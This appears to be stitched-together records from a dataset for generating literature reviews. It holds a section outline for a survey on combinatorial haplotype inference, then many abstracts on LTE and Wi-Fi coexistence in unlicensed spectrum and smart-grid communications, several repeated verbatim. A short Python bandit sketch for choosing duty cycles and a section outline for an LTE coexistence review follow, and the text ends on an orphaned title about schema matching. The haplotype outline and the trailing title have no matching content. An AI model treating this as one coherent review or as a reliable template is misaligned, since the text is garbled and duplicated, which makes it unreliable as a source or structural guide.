Title: An Overview of Combinatorial Methods for Haplotype Inference Section 1: Introduction to SNP's, Genotypes and Haplotypes Description 1: Introduce the basic biological concepts necessary for understanding haplotype inference, including SNPs, genotypes, and haplotypes. Section 2: The biological problem Description 2: Discuss the experimental challenges and motivations for distinguishing haplotypes from genotypes in genetic data. Section 3: The computational problem Description 3: Describe the computational challenge of inferring haplotypes from genotype data, including the ambiguity and complexity of possible solutions. Section 4: The need for a genetic model Description 4: Explain the importance of genetic models to guide algorithm development and validation for haplotype inference. Section 5: Optimizing Clark's method Description 5: Detail Clark's pioneering algorithm for haplotype inference and explore its mechanisms, strengths, and shortcomings. Section 6: The MR problem Description 6: Introduce the Maximum Resolution (MR) problem, which aims to maximize the number of resolved genotypes using Clark's method and its computational complexity. Section 7: A graph-theoretic view of the MR problem Description 7: Present a graph-theoretic approach to solving the MR problem, including the construction and analysis of the corresponding directed graph. Section 8: An Exact Integer Programming formulation for the MRG problem Description 8: Introduce an integer linear programming approach to accurately solve the MRG problem, detailing its constraints and formulations. Section 9: Results Description 9: Summarize the findings from simulations and experiments that validate the maximum-resolution hypothesis and its implications on haplotype accuracy. Section 10: Supercharging Clark's method Description 10: Discuss enhancements to Clark's method to improve accuracy, including multiple executions and selecting solutions with the fewest distinct haplotypes. Section 11: Perfect Phylogeny Description 11: Introduce the perfect phylogeny model for haplotype inference and its foundational principles in population genetics. Section 12: What happened to the genotype data? Description 12: Discuss the application of the perfect phylogeny model to real genotype data and how it helps in deducing haplotypes. Section 13: Algorithm and program GPPH Description 13: Detail the GPPH algorithm for solving the Perfect Phylogeny Haplotype (PPH) problem and its computational efficiency. Section 14: Algorithm and Program DPPH Description 14: Introduce the DPPH algorithm, an alternative method for solving the PPH problem with its own computational strategies. Section 15: Algorithm and program HPPH Description 15: Discuss the HPPH algorithm, a third approach for PPH problem, and compare its efficacy with GPPH and DPPH. Section 16: Comparing the execution of the programs Description 16: Compare the performance and accuracy of GPPH, DPPH, and HPPH programs, highlighting findings from empirical tests. Section 17: Uniqueness of the solution: a Strong phase transition Description 17: Examine the conditions under which unique PPH solutions are likely to occur, based on experimental results. Section 18: Handling haplotypes generated by some recombinations Description 18: Review the approach for dealing with recombination events in haplotype inference and the utility of maximal interval solutions. 
Section 19: Adding Recombination into the model Description 19: Explore the extension of the perfect phylogeny model to include recombination and the challenges of developing the Phylogenetic Network Haplotyping (PNH) Problem.
LTE and Wi-Fi Coexistence in Unlicensed Spectrum with Application to Smart Grid: A Review
11
--- paper_title: Modeling and Analyzing the Coexistence of Licensed-Assisted Access LTE and Wi-Fi paper_content: Licensed-assisted access (LAA) is a feature of Long-Term Evolution (LTE) which enables operation in the unlicensed spectrum. LAA guarantees fair coexistence with Wi-Fi by implementing the listen- before-talk (LBT) mechanism. In this paper, we leverage stochastic geometry to characterize key performance metrics of neighboring LAA and Wi-Fi networks. Our analysis is focused on a single unlicensed frequency band, where the locations for coexisting LTE eNodeBs (eNBs) and Wi-Fi access points (APs) are modeled as two independent homogeneous Poisson point processes (PPPs). Based on an analytical modeling of the channel access procedure, we have derived the medium access probability (MAP), the signal-to- interference-plus-noise ratio (SINR) distribution, the density of successful transmissions (DST), and the data rate distribution for both LAA and Wi-Fi. We show that compared to the baseline scenario where Wi-Fi coexists with an additional Wi-Fi network, LAA can improve the DST and data rate performance of Wi-Fi by adopting more sensitive clear channel assessment thresholds and/or larger contention window sizes. Meanwhile, LAA is demonstrated to achieve acceptable data rate performance despite using LBT. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Coexistence of Wi-Fi and Heterogeneous Small Cell Networks Sharing Unlicensed Spectrum paper_content: As two major players in terrestrial wireless communications, Wi-Fi systems and cellular networks have different origins and have largely evolved separately. Motivated by the exponentially increasing wireless data demand, cellular networks are evolving towards a heterogeneous and small cell network architecture, wherein small cells are expected to provide very high capacity. However, due to the limited licensed spectrum for cellular networks, any effort to achieve capacity growth through network densification will face the challenge of severe inter-cell interference. 
In view of this, recent standardization developments have started to consider the opportunities for cellular networks to use the unlicensed spectrum bands, including the 2.4 GHz and 5 GHz bands that are currently used by Wi-Fi, Zigbee and some other communication systems. In this article, we look into the coexistence of Wi-Fi and 4G cellular networks sharing the unlicensed spectrum. We introduce a network architecture where small cells use the same unlicensed spectrum that Wi-Fi systems operate in without affecting the performance of Wi-Fi systems. We present an almost blank subframe (ABS) scheme without priority to mitigate the co-channel interference from small cells to Wi-Fi systems, and propose an interference avoidance scheme based on small cells estimating the density of nearby Wi-Fi access points to facilitate their coexistence while sharing the same unlicensed spectrum. Simulation results show that the proposed network architecture and interference avoidance schemes can significantly increase the capacity of 4G heterogeneous cellular networks while maintaining the service quality of Wi-Fi systems. --- paper_title: Experimental study of concurrent transmission in wireless sensor networks paper_content: We undertake a systematic experimental study of the effects of concurrent packet transmissions in low-power wireless networks. Our measurements, conducted with Mica2 motes equipped with CC1000 radios, confirm that guaranteeing successful packet reception with high probability in the presence of concurrent transmissions requires that the signal-to-interference-plus-noise-ratio (SINR) exceed a critical threshold. However, we find a significant variation of about 6 dB in the threshold for groups of radios operating at different transmission powers. We find that it is harder to estimate the level of interference in the presence of multiple interferers. We also find that the measured SINR threshold generally increases with the number of interferers. Our study offers a better understanding of concurrent transmissions and suggests richer interference models and useful guidelines to improve the design and analysis of higher layer protocols. --- paper_title: Licensed-assisted access for LTE in unlicensed spectrum: A MAC protocol design paper_content: Licensed-assisted access (LAA), which conveys data information via both licensed and unlicensed bands through spectrum aggregation, becomes a promising solution to enhance the capacity of wireless systems. In view of the potential impact on the incumbent system operating in unlicensed bands, the medium access control (MAC) protocol design for LAA system to harmonically coexist with its neighboring incumbent users is one of the most critical and challenging issues. In this paper, we consider a long-term evolution-based LAA (LAA-LTE) system operating in the WiFi unlicensed spectrum, for which the listen-before-talk-based MAC protocol is carefully designed. By quantifying the WiFi throughput and packet delay in the coexisting system, we formulate the constraints of LAA-LTE transmission time to fairly maintain WiFi services. The conditions of known and unknown network size of incumbent WiFi system are each considered separately. Then, the feasible region of LAA-LTE transmission time is determined, and the LAA-LTE protocol is optimized for maximizing the LAA-LTE throughput or the overall throughput contributed by both LAA-LTE and WiFi system. 
The theoretical analysis is validated via simulation, which also illustrates important observations when LAA-LTE and WiFi systems coexist. This paper offers guidelines to design the LAA-LTE system, paving the way to a controllable, not only harmonious, coexistence of LAA-LTE and WiFi systems in the unlicensed spectrum. --- paper_title: A SURVEY OF LTE WI-FI COEXISTENCE IN UNLICENSED BANDS paper_content: With the rapid growth of mobile data, many LTE operators are interested in leveraging unlicensed bands to enhance data rates and user experience. Th is paper investigates the problem of the coexistence of LTE and Wi-Fi in 5 GHz unlicensed bands. We fi rst introduce the current rules for the 5 GHz unlicensed bands and the carrier aggregation technique. We then discuss four deployment scenarios and two LTE-unlicensed (LTE-U) coexistence scenarios. Further, we provide a feature comparison between LTE and Wi-Fi in the PHY/MAC layers, and review the coexistence methods for LTE-U and Wi-Fi without or with the Listen- Before-Talk (LBT) mechanism. Th is paper is concluded by an examination of Wi-Fi link aggregation and in-device coexistence issues. --- paper_title: Multi-armed bandit for LTE-U and WiFi coexistence in unlicensed bands paper_content: In order to cope with the phenomenal growth of mobile data traffic, unlicensed spectrum can be utilized by the Long Term Evolution (LTE) cellular systems. However, ensuring fair coexistence with WiFi is a mandatory requirement. In one approach, periodically configurable transmission gaps can be used to facilitate a coexistence between WiFi and LTE. In this paper, a Multi-Armed Bandit (MAB) based dynamic duty cycle selection method is proposed for configuration of transmission gaps ensuring a better coexistence for both technologies. Then the concept is further strengthened with downlink power control mechanism using the same algorithm leading to a high energy efficiency and interference reduction. Performance results are given for different user equipment and WiFi station densities in which it is shown that significant improvements in overall throughput and energy efficiency can be achieved. --- paper_title: Performance Analysis of LAA and WiFi Coexistence in Unlicensed Spectrum Based on Markov Chain paper_content: License-assisted access (LAA) is a candidate feature in 3GPP Rel-13 to meet the explosive growth of traffic demand. The main idea of LAA is to deploy LTE in the unlicensed band (mainly the 5GHz band), which is abundant with available spectrum. However, the major concern is the coexistence between WiFi and LAA in the same band. This paper presents a new framework to evaluate the downlink performance of coexisting LAA and WiFi networks. By using Markov chain, analytical models are established based on WiFi distributed coordination function (DCF) and two listen-before- talk (LBT) schemes. These two LBT schemes are Cat 3 and Cat 4 LBT, which mainly differ in medium access schemes in terms of backoff procedure. Unlike most existing works, which focus on the impact on WiFi performance posed by LAA, the performance of LAA is also evaluated. Our analysis shows that throughput of a WiFi network can be enhanced by adding or replacing WiFi access points (APs) with LAA E-UTRAN Node Bs (eNBs), at the expense of different levels of WiFi performance degradation. A trade-off between WiFi protection and LAA-WiFi system performance enhancement is observed. 
WiFi throughput and delay are less affected by Cat 4 LBT scheme, while Cat 3 LBT scheme provides higher LAA-WiFi system throughput. The choice of LBT schemes relies on the network planning priority, WiFi performance protection and LAA system performance requirements. --- paper_title: A review of wireless communications for smart grid paper_content: Smart grid is envisioned to meet the 21st century energy requirements in a sophisticated manner with real time approach by integrating the latest digital communications and advanced control technologies to the existing power grid. It will connect the global users through energy efficiency and awareness corridor. This paper presents a comprehensive review of Wireless Communications Technologies (WCTs) for implementation of smart grid in a systematic way. Various network attributes like internet protocol (IP) support, power usage, data rate etc. are considered to compare the communications technologies in smart grid context. Techniques suitable for Home Area Networks (HANs) like ZigBee, Bluetooth, Wi-Fi, 6LoWPAN and Z-Wave are discussed and compared in context of consumer concerns and network attributes. A similar approach in context of utilities concerns is adopted for wireless communications techniques for Neighborhood Area Networks (NANs) which include WiMAX and GSM based cellular standards. Smart grid applications, associated network issues and challenges are elaborated at the end. --- paper_title: Simultaneous transmission opportunities for LTE-LAA smallcells coexisting with WiFi in unlicensed spectrum paper_content: LTE License-Assisted Access (LTE-LAA) in unlicensed spectrum has drawn a lot of attention due to its appealing data traffic offloading potential. However, the coexistence of LTE and WiFi technologies in the same unlicensed bands needs careful design to avoid severe interference between them. In this paper, we propose a coexistence scheme to create opportunities for LTE-LAA small cells and WiFi devices to transmit simultaneously. We combine Multiple Signal Classification (MUSIC) direction of arrival (DOA) estimation with null steering techniques to avoid collisions between LTE-LAA and WiFi transmissions. We assume that the LTE-LAA small cells are equipped with the latest 802.11 receivers for monitoring WiFi transmissions and for capturing simultaneous transmission timing. The performance of the proposed scheme in terms of collision avoidance and channel occupancy time ratio is evaluated via simulations. The results show that with DOA estimation and null steering, LTE-LAA small cells can transmit simultaneously with nearby WiFi devices without causing significant interference to them. As a result, LTE-LAA small cells can gain much more channel access opportunities and longer channel occupancy time while being “invisible” to coexisting WiFi networks. --- paper_title: LAA-based LTE and ZigBee coexistence for unlicensed-band smart grid communications paper_content: The advent of smart grid introduces abundant number of smart meters which require bidirectional reliable communication. The deployment of advanced metering infrastructure (AMI) in smart grid networks will be auspicious if the existing infrastructure of LTE networks can be utilized. On the other hand, use of LTE infrastructure and spectrum by AMIs will further load the already congested broadband wireless networks. Recently, use of the unlicensed spectrum by the LTE technology is seen as a promising approach to offload the existing traffic from the licensed spectrum. 
In our study, we investigate the coexistence of LTE and ZigBee networks at the unlicensed frequency band of 2.4 GHz. We consider a time division duplexing (TDD)-LTE system accompanied by ZigBee network with FTP traffic model for system level simulations. The simulation results demonstrate that the simultaneous operation of LTE and ZigBee on the 2.4 GHz band reduces ZigBee's performance, but still meets the data communication requirements for AMI as prescribed by Department of Energy (DoE). --- paper_title: Licensed-assisted access for WiFi-LTE coexistence in the unlicensed spectrum paper_content: One of the effective ways to address the exponentially increasing traffic demand in mobile communication systems is to use more spectrum. Although licensed spectrum is always preferable for providing better user experience, unlicensed spectrum can be considered as an effective complement. Before moving into unlicensed spectrum, it is essential to carry out proper coexistence performance evaluations. In this paper, we analyze WiFi 802.11n and Long Term Evolution (LTE) coexistence performance considering multi-layer cell layouts through system level simulations. We consider a time division duplexing (TDD)-LTE system with an FTP traffic model for performance evaluation. Simulation results show that WiFi performance is more vulnerable to LTE interference, while LTE performance is degraded only slightly. However, WiFi throughput degradation is lower for TDD configurations with larger number of LTE uplink sub-frames and smaller path loss compensation factors. --- paper_title: Hybrid Wi-Fi/LTE aggregation architecture for smart meter communications paper_content: The 3GPP Long Term Evolution (LTE) technology and its evolutions are promising candidate technologies to support smart meter communications. However, smart meter traffic is uplink heavy and needs large number of simultaneously connected users. This reduces LTE's potential to be employed for smart meter communications. To improve the overall performance, in this paper, we propose a hybrid WiFi-LTE aggregation data communication architecture. Specifically, two IEEE 802.11 based layers (IEEE 802.11b/g/n and IEEE 802.11s) are added to the bottom of the LTE architecture to aggregate local smart grid data and pass the aggregated data through limited number of LTE enabled nodes. These hybrid network architectures are evaluated using extensive ns-3 simulations, and their performance are compared with baseline LTE under smart grid traffic profile. Results show that proposed architectures can improve control channel and random access channel performance, at the cost of tolerable latency degradation. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. 
Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Experimental study of concurrent transmission in wireless sensor networks paper_content: We undertake a systematic experimental study of the effects of concurrent packet transmissions in low-power wireless networks. Our measurements, conducted with Mica2 motes equipped with CC1000 radios, confirm that guaranteeing successful packet reception with high probability in the presence of concurrent transmissions requires that the signal-to-interference-plus-noise-ratio (SINR) exceed a critical threshold. However, we find a significant variation of about 6 dB in the threshold for groups of radios operating at different transmission powers. We find that it is harder to estimate the level of interference in the presence of multiple interferers. We also find that the measured SINR threshold generally increases with the number of interferers. Our study offers a better understanding of concurrent transmissions and suggests richer interference models and useful guidelines to improve the design and analysis of higher layer protocols. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Multi-armed bandit for LTE-U and WiFi coexistence in unlicensed bands paper_content: In order to cope with the phenomenal growth of mobile data traffic, unlicensed spectrum can be utilized by the Long Term Evolution (LTE) cellular systems. However, ensuring fair coexistence with WiFi is a mandatory requirement. In one approach, periodically configurable transmission gaps can be used to facilitate a coexistence between WiFi and LTE. 
In this paper, a Multi-Armed Bandit (MAB) based dynamic duty cycle selection method is proposed for configuration of transmission gaps ensuring a better coexistence for both technologies. Then the concept is further strengthened with downlink power control mechanism using the same algorithm leading to a high energy efficiency and interference reduction. Performance results are given for different user equipment and WiFi station densities in which it is shown that significant improvements in overall throughput and energy efficiency can be achieved. --- paper_title: LTE in the unlicensed spectrum: Evaluating coexistence mechanisms paper_content: The Long Term Evolution (LTE) in unlicensed spectrum is an emerging topic in the 3rd Generation Partnership Project (3GPP), which is about an operation of the LTE system in the unlicensed spectrum via license-assisted carrier aggregation. The 5 GHz Unlicensed National Information Infrastructure (U-NII) bands are currently under consideration, but these bands are also occupied by Wireless Local Area Networks (WLAN), specifically those based on the IEEE 802.11a/n/ac technologies. Therefore, an appropriate coexistence mechanism must be augmented to guarantee a peaceful coexistence with the incumbent systems. With this regard, our focus lies on the evaluation of all the proposed coexistence mechanisms so far in a single framework and making a fair comparison of them. The coexistence mechanisms covered in this work includes static muting, listen-before-talk (LBT), and other sensing-based schemes that make a use of the existing WLAN channel reservation protocol. --- paper_title: Hybrid Wi-Fi/LTE aggregation architecture for smart meter communications paper_content: The 3GPP Long Term Evolution (LTE) technology and its evolutions are promising candidate technologies to support smart meter communications. However, smart meter traffic is uplink heavy and needs large number of simultaneously connected users. This reduces LTE's potential to be employed for smart meter communications. To improve the overall performance, in this paper, we propose a hybrid WiFi-LTE aggregation data communication architecture. Specifically, two IEEE 802.11 based layers (IEEE 802.11b/g/n and IEEE 802.11s) are added to the bottom of the LTE architecture to aggregate local smart grid data and pass the aggregated data through limited number of LTE enabled nodes. These hybrid network architectures are evaluated using extensive ns-3 simulations, and their performance are compared with baseline LTE under smart grid traffic profile. Results show that proposed architectures can improve control channel and random access channel performance, at the cost of tolerable latency degradation. --- paper_title: Frequency band for HAN and NAN communication in Smart Grid paper_content: Smart Grid metering and control applications require fast and secured two-way communication. IEEE 802.15.4 based ZigBee is one of the leading communication protocols for Advanced Metering Infrastructure (AMI). In North America, ZigBee supports two distinguished frequency bands — 915MHz and 2.4GHz. In Home Area Network (HAN) of AMI, home appliances communicate with smart meters whereas the communication among neighboring meters is termed as Neighborhood Area Network (NAN). In this study, optimum frequency bands for NAN and HAN communication have been proposed based on the throughput, reliability and scalability. We evaluated and compared the performance of bands 868/915MHz and 2.4GHz for AMI context. 
The solution also meets the requirements for Smart Grid communication standards as recommended by the US Department of Energy (DOE). --- paper_title: Multi-armed bandit for LTE-U and WiFi coexistence in unlicensed bands paper_content: In order to cope with the phenomenal growth of mobile data traffic, unlicensed spectrum can be utilized by the Long Term Evolution (LTE) cellular systems. However, ensuring fair coexistence with WiFi is a mandatory requirement. In one approach, periodically configurable transmission gaps can be used to facilitate a coexistence between WiFi and LTE. In this paper, a Multi-Armed Bandit (MAB) based dynamic duty cycle selection method is proposed for configuration of transmission gaps ensuring a better coexistence for both technologies. Then the concept is further strengthened with downlink power control mechanism using the same algorithm leading to a high energy efficiency and interference reduction. Performance results are given for different user equipment and WiFi station densities in which it is shown that significant improvements in overall throughput and energy efficiency can be achieved. --- paper_title: Licensed-assisted access for WiFi-LTE coexistence in the unlicensed spectrum paper_content: One of the effective ways to address the exponentially increasing traffic demand in mobile communication systems is to use more spectrum. Although licensed spectrum is always preferable for providing better user experience, unlicensed spectrum can be considered as an effective complement. Before moving into unlicensed spectrum, it is essential to carry out proper coexistence performance evaluations. In this paper, we analyze WiFi 802.11n and Long Term Evolution (LTE) coexistence performance considering multi-layer cell layouts through system level simulations. We consider a time division duplexing (TDD)-LTE system with an FTP traffic model for performance evaluation. Simulation results show that WiFi performance is more vulnerable to LTE interference, while LTE performance is degraded only slightly. However, WiFi throughput degradation is lower for TDD configurations with larger number of LTE uplink sub-frames and smaller path loss compensation factors. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. 
Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Frequency band for HAN and NAN communication in Smart Grid paper_content: Smart Grid metering and control applications require fast and secured two-way communication. IEEE 802.15.4 based ZigBee is one of the leading communication protocols for Advanced Metering Infrastructure (AMI). In North America, ZigBee supports two distinguished frequency bands — 915MHz and 2.4GHz. In Home Area Network (HAN) of AMI, home appliances communicate with smart meters whereas the communication among neighboring meters is termed as Neighborhood Area Network (NAN). In this study, optimum frequency bands for NAN and HAN communication have been proposed based on the throughput, reliability and scalability. We evaluated and compared the performance of bands 868/915MHz and 2.4GHz for AMI context. The solution also meets the requirements for Smart Grid communication standards as recommended by the US Department of Energy (DOE). --- paper_title: Modeling and Analyzing the Coexistence of Licensed-Assisted Access LTE and Wi-Fi paper_content: Licensed-assisted access (LAA) is a feature of Long-Term Evolution (LTE) which enables operation in the unlicensed spectrum. LAA guarantees fair coexistence with Wi-Fi by implementing the listen-before-talk (LBT) mechanism. In this paper, we leverage stochastic geometry to characterize key performance metrics of neighboring LAA and Wi-Fi networks. Our analysis is focused on a single unlicensed frequency band, where the locations for coexisting LTE eNodeBs (eNBs) and Wi-Fi access points (APs) are modeled as two independent homogeneous Poisson point processes (PPPs). Based on an analytical modeling of the channel access procedure, we have derived the medium access probability (MAP), the signal-to-interference-plus-noise ratio (SINR) distribution, the density of successful transmissions (DST), and the data rate distribution for both LAA and Wi-Fi. We show that compared to the baseline scenario where Wi-Fi coexists with an additional Wi-Fi network, LAA can improve the DST and data rate performance of Wi-Fi by adopting more sensitive clear channel assessment thresholds and/or larger contention window sizes. Meanwhile, LAA is demonstrated to achieve acceptable data rate performance despite using LBT. --- paper_title: A SURVEY OF LTE WI-FI COEXISTENCE IN UNLICENSED BANDS paper_content: With the rapid growth of mobile data, many LTE operators are interested in leveraging unlicensed bands to enhance data rates and user experience. This paper investigates the problem of the coexistence of LTE and Wi-Fi in 5 GHz unlicensed bands. We first introduce the current rules for the 5 GHz unlicensed bands and the carrier aggregation technique. We then discuss four deployment scenarios and two LTE-unlicensed (LTE-U) coexistence scenarios. Further, we provide a feature comparison between LTE and Wi-Fi in the PHY/MAC layers, and review the coexistence methods for LTE-U and Wi-Fi without or with the Listen-Before-Talk (LBT) mechanism. This paper is concluded by an examination of Wi-Fi link aggregation and in-device coexistence issues. --- paper_title: Simultaneous transmission opportunities for LTE-LAA smallcells coexisting with WiFi in unlicensed spectrum paper_content: LTE License-Assisted Access (LTE-LAA) in unlicensed spectrum has drawn a lot of attention due to its appealing data traffic offloading potential.
However, the coexistence of LTE and WiFi technologies in the same unlicensed bands needs careful design to avoid severe interference between them. In this paper, we propose a coexistence scheme to create opportunities for LTE-LAA small cells and WiFi devices to transmit simultaneously. We combine Multiple Signal Classification (MUSIC) direction of arrival (DOA) estimation with null steering techniques to avoid collisions between LTE-LAA and WiFi transmissions. We assume that the LTE-LAA small cells are equipped with the latest 802.11 receivers for monitoring WiFi transmissions and for capturing simultaneous transmission timing. The performance of the proposed scheme in terms of collision avoidance and channel occupancy time ratio is evaluated via simulations. The results show that with DOA estimation and null steering, LTE-LAA small cells can transmit simultaneously with nearby WiFi devices without causing significant interference to them. As a result, LTE-LAA small cells can gain much more channel access opportunities and longer channel occupancy time while being “invisible” to coexisting WiFi networks. --- paper_title: Licensed-assisted access for WiFi-LTE coexistence in the unlicensed spectrum paper_content: One of the effective ways to address the exponentially increasing traffic demand in mobile communication systems is to use more spectrum. Although licensed spectrum is always preferable for providing better user experience, unlicensed spectrum can be considered as an effective complement. Before moving into unlicensed spectrum, it is essential to carry out proper coexistence performance evaluations. In this paper, we analyze WiFi 802.11n and Long Term Evolution (LTE) coexistence performance considering multi-layer cell layouts through system level simulations. We consider a time division duplexing (TDD)-LTE system with an FTP traffic model for performance evaluation. Simulation results show that WiFi performance is more vulnerable to LTE interference, while LTE performance is degraded only slightly. However, WiFi throughput degradation is lower for TDD configurations with larger number of LTE uplink sub-frames and smaller path loss compensation factors. --- paper_title: A review of wireless communications for smart grid paper_content: Smart grid is envisioned to meet the 21st century energy requirements in a sophisticated manner with real time approach by integrating the latest digital communications and advanced control technologies to the existing power grid. It will connect the global users through energy efficiency and awareness corridor. This paper presents a comprehensive review of Wireless Communications Technologies (WCTs) for implementation of smart grid in a systematic way. Various network attributes like internet protocol (IP) support, power usage, data rate etc. are considered to compare the communications technologies in smart grid context. Techniques suitable for Home Area Networks (HANs) like ZigBee, Bluetooth, Wi-Fi, 6LoWPAN and Z-Wave are discussed and compared in context of consumer concerns and network attributes. A similar approach in context of utilities concerns is adopted for wireless communications techniques for Neighborhood Area Networks (NANs) which include WiMAX and GSM based cellular standards. Smart grid applications, associated network issues and challenges are elaborated at the end. ---
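The learning-based coexistence schemes cited above (Q-learning over unlicensed-band activity, and a multi-armed bandit choosing transmission-gap duty cycles) share one core loop: treat each candidate configuration as an action, observe a throughput-derived reward, and update that action's estimated value. The fragment below is a minimal epsilon-greedy bandit over a hypothetical set of duty cycles; the arm set, the toy reward model and all parameter values are illustrative assumptions, not the setups of the cited papers.

import random

def epsilon_greedy_duty_cycle(reward_fn, duty_cycles=(0.2, 0.4, 0.6, 0.8),
                              epsilon=0.1, rounds=1000, seed=0):
    """Learn the value of each candidate LTE-U duty cycle from observed rewards."""
    rng = random.Random(seed)
    counts = {d: 0 for d in duty_cycles}
    values = {d: 0.0 for d in duty_cycles}
    for _ in range(rounds):
        if rng.random() < epsilon:                    # explore a random arm
            arm = rng.choice(duty_cycles)
        else:                                         # exploit the best estimate so far
            arm = max(duty_cycles, key=lambda d: values[d])
        reward = reward_fn(arm, rng)
        counts[arm] += 1
        values[arm] += (reward - values[arm]) / counts[arm]   # incremental sample mean
    return values

def toy_reward(duty_cycle, rng):
    # Hypothetical reward: sum of LTE and WiFi throughput (Mb/s) under the chosen
    # airtime split, plus measurement noise; not a real channel or traffic model.
    return duty_cycle * 10.0 + (1.0 - duty_cycle) * 8.0 + rng.gauss(0.0, 0.5)

if __name__ == "__main__":
    print(epsilon_greedy_duty_cycle(toy_reward))

Roughly speaking, the Q-learning and double Q-learning schemes cited above extend this loop with a sensed channel-activity state and a bootstrapped update target in place of the plain running mean.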
Title: LTE and Wi-Fi Coexistence in Unlicensed Spectrum with Application to Smart Grid: A Review Section 1: INTRODUCTION Description 1: This section introduces the motivations behind LTE and Wi-Fi coexistence in unlicensed spectrum, emphasizing the increasing data traffic from smart devices and smart grid networks. Section 2: Wi-Fi Technology Description 2: This section covers the basic principles and operational mechanisms of Wi-Fi technology, including its advantages and MAC layer mechanisms. Section 3: LTE Technology Description 3: This section explains the fundamentals of LTE technology, its architecture, and the types of LTE deployment in unlicensed spectrum. Section 4: COEXISTENCE CHALLENGES IN SMART GRID Description 4: This section discusses the challenges faced in the coexistence of Wi-Fi and LTE within smart grid communication networks, highlighting interference and compatibility issues. Section 5: COEXISTENCE MECHANISM Description 5: This section presents two LTE-U coexistence scenarios: coexistence between Wi-Fi and LTE and coexistence between LTE of different operators, explaining why different mechanisms are necessary. Section 6: LTE vs Wi-Fi Description 6: This section examines the coexistence between Wi-Fi and LTE, discussing the differences in radio frame structure, transmission scheduling, and their impact on channel usage. Section 7: LTE-U vs LTE-U Description 7: This section explores the coexistence issues between LTE-Us from different operators, focusing on the interference and coordination required for spectrum efficiency. Section 8: TECHNIQUES FOR COEXISTENCE Description 8: This section reviews various techniques developed for coexistence, both with and without regulatory Listen Before Talk (LBT) requirements, and their effectiveness. Section 9: Coexistence without LBT Description 9: This section details coexistence mechanisms in countries without LBT requirements, including Channel Selection, Carrier-Sensing-Adaptive Transmission, and Opportunistic Supplementary Downlink. Section 10: Coexistence Based on LBT Mechanism Description 10: This section discusses coexistence mechanisms that adhere to LBT regulations, including Frame-based Equipment and Load-based Equipment methods. Section 11: CONCLUSION Description 11: This section summarizes the key findings of the paper, offering insights into how coexistence mechanisms can ensure fair and efficient use of unlicensed spectrum in smart grid communication networks.
A survey of approaches to automatic schema matching
10
